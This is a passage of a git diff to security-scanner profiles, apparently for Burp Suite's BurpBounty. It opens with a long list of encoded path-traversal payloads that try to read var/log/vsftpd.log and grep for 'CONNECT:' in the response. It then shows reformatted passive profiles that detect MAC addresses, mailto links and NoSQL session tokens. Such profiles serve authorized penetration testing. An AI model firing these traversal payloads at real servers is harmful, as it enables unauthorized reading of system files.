"true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,CONNECT:" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-vsftpd-log", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-vsftpd-log listed", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "var/log/vsftpd.log", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/MAC_Address.bb b/profiles/MAC_Address.bb old mode 100644 new mode 100755 index 650f5c5..aa767fd --- a/profiles/MAC_Address.bb +++ b/profiles/MAC_Address.bb @@ -1 +1,60 @@ -[{"Name":"MAC_Address","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})","true,Or,[^a-zA-Z0-9]([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"MAC Address","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "MAC_Address", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})", + "true,Or,[^a-zA-Z0-9]([a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5})" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "MAC Address", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Mailto.bb b/profiles/Mailto.bb old mode 100644 new mode 100755 index ec39786..765599b --- a/profiles/Mailto.bb +++ b/profiles/Mailto.bb @@ -1 +1,59 @@ -[{"Name":"Mailto","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?\u003c\u003dmailto:)[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9.-]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Mailto","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Mailto", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?\u003c\u003dmailto:)[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9.-]+" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Mailto", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/NoSQL_Session_Token.bb b/profiles/NoSQL_Session_Token.bb old mode 100644 new mode 100755 index 61c1fd8..832f91e --- a/profiles/NoSQL_Session_Token.bb +++ b/profiles/NoSQL_Session_Token.bb @@ -1 +1,59 @@ -[{"Name":"NoSQL_Session_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,_SessionToken"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"NoSQL Session Token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "NoSQL_Session_Token", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,_SessionToken" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 